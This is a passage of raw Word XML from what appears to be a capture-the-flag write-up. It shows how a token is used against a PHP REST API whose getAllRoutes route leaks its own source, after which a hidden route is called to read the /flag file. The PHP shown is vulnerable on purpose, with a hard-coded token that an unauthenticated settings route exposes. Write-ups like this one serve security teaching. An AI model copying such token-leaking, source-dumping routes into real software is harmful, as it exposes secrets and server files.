        <w:t xml:space="preserve">token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can make requests to these routes. We start by sending a request to: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/restapi/getStacks?token=YTk4YmU1YTYtYzdjYi00ZTdlLTg3YmItYTZiYzgwY2JmMDkz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>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29">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984500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2984500"/>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2B">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We continue making requests to other routes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>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2D">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452481"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2452481"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When making a request to /</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">restapi/getAllRoutes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we receive a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value, so we decode it. After decoding, we obtain the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>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2F">
      <w:pPr>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30">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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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$request = $_SERVER['REQUEST_URI'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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$request = explode('?',$request)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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header('Content-Type: application/json');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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header('x-powered-by: Express');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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if(isset($_GET['token'])){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:ind w:firstLine="720"/>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$token = $_GET['token'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:ind w:firstLine="720"/>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$token = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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switch ($request) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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case '/restapi/' :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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if(base64_decode($token) === 'a98be5a6-c7cb-4e7e-87bb-a6bc80cbf093'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(200);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'ok', 'health'=&gt;'online']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(401);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'access denied']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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043">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044">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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case '/restapi' :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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if(base64_decode($token) === 'a98be5a6-c7cb-4e7e-87bb-a6bc80cbf093'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(200);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'ok', 'health'=&gt;'online']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(401);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'access denied']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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04D">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04E">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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case '/restapi/getStacks' :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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if(base64_decode($token) === 'a98be5a6-c7cb-4e7e-87bb-a6bc80cbf093'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(200);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'ok', 'stacks'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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1=&gt;['html','css','js'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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2=&gt;['rest'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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3=&gt;['NoSQL','MongoDB'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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4=&gt;'PHP',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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5=&gt;'[INFO_REDACTED]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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059">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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(401);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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tab/>
        <w:t xml:space="preserve">echo json_encode(['status'=&gt;'access denied']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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05D">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05E">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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case '/restapi/getAllRoutes' :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:ind w:firstLine="720"/>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if(base64_decode($token) === 'a98be5a6-c7cb-4e7e-87bb-a6bc80cbf093'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(200);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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echo json_encode(['status'=&gt;'ok', 'dump_file_routes'=&gt;base64_encode(file_get_contents(__FILE__))]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(401);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'access denied']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">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067">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068">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">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case '/restapi/getDefaultSettings' :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'ok', 'settings'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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'SYSTEM_URL'=&gt; 'http://' . $_SERVER['HTTP_HOST'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">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'SYSTEM_API'=&gt;'http://' . $_SERVER['HTTP_HOST'] . '/restapi/',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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'TOKEN'=&gt;base64_encode('a98be5a6-c7cb-4e7e-87bb-a6bc80cbf093')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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06F">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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case '/restapi/getMasterRootFlag' :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:ind w:firstLine="720"/>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if(base64_decode($token) === 'a98be5a6-c7cb-4e7e-87bb-a6bc80cbf093'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(200);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">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echo json_encode(['status'=&gt;'ok', 'dump_flag'=&gt;base64_encode(file_get_contents('/flag'))]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(401);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'access denied']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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078">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079">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">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default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:ind w:firstLine="720"/>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http_response_code(404);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:ind w:firstLine="720"/>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echo json_encode(['status'=&gt;'route not found']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>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80">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What draws attention is the route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/restapi/getMasterRootFlag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which dumps a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">located in the root directory /. We can send a request to this route using our valid </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">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247900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>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83">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It returns another Base64 value. After decoding it, we obtain our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>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85">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032000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2032000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>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87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
